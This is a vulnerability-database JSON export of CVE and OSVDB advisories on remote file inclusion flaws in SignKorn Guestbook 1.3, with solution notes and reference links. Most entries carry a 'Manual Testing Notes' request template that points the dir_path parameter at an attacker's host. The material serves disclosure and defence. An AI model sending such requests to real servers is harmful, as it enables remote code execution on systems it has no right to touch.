{"result": {"cve": [{"id": "CVE-2006-4889", "type": "cve", "title": "CVE-2006-4889", "description": "Multiple PHP remote file inclusion vulnerabilities in Telekorn SignKorn Guestbook (SL) 1.3 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the dir_path parameter in (1) index.php, (2) includes/functions.gb.php, (3) includes/functions.admin.php, (4) includes/admin.inc.php, (5) help.php, (6) smile.php, (7) entry.php; (8) adminhelp0.php, (9) adminhelp1.php, (10) adminhelp2.php, and (11) adminhelp3.php in (a) help/en and (b) help/de directories; and the (12) preview.php, (13) log.php, (14) index.php, (15) config.php, and (16) admin.php in the (c) admin directory, a different set of vectors than CVE-2006-4788.", "published": "2006-09-19T17:07:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4889", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-07-20T10:49:33"}, {"id": "CVE-2006-4788", "type": "cve", "title": "CVE-2006-4788", "description": "PHP remote file inclusion vulnerability in includes/log.inc.php in Telekorn SignKorn Guestbook (SL) 1.3 and earlier, when register_globals is enabled and _SESSION[permission] parameter is set to \"yes\", allows remote attackers to execute arbitrary PHP code via a URL in the dir_path parameter.", "published": "2006-09-14T06:07:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4788", "cvelist": ["CVE-2006-4788"], "lastseen": "2017-10-19T11:12:31"}], "osvdb": [{"id": "OSVDB:32207", "type": "osvdb", "title": "SignKorn Guestbook help/en/adminhelp2.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/en/adminhelp2.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/en/adminhelp2.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/help/en/adminhelp2.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32207", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32210", "type": "osvdb", "title": "SignKorn Guestbook help/de/adminhelp1.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/de/adminhelp1.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/de/adminhelp1.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/help/de/adminhelp1.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32210", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32202", "type": "osvdb", "title": "SignKorn Guestbook includes/admin.inc.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/admin.inc.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/admin.inc.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/includes/admin.inc.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32202", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32217", "type": "osvdb", "title": "SignKorn Guestbook admin/config.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/config.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/config.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/admin/config.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32217", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32212", "type": "osvdb", "title": "SignKorn Guestbook help/de/adminhelp3.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/de/adminhelp3.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/de/adminhelp3.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/help/de/adminhelp3.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32212", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32216", "type": "osvdb", "title": "SignKorn Guestbook admin/index.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/index.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/index.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/admin/index.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32216", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32200", "type": "osvdb", "title": "SignKorn Guestbook includes/functions.gb.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/functions.gb.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/functions.gb.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/includes/functions.gb.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32200", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32211", "type": "osvdb", "title": "SignKorn Guestbook help/de/adminhelp2.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/de/adminhelp2.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the help/de/adminhelp2.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/help/de/adminhelp2.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32211", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32215", "type": "osvdb", "title": "SignKorn Guestbook admin/log.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/log.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/log.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/admin/log.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32218](https://vulners.com/osvdb/OSVDB:32218)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": 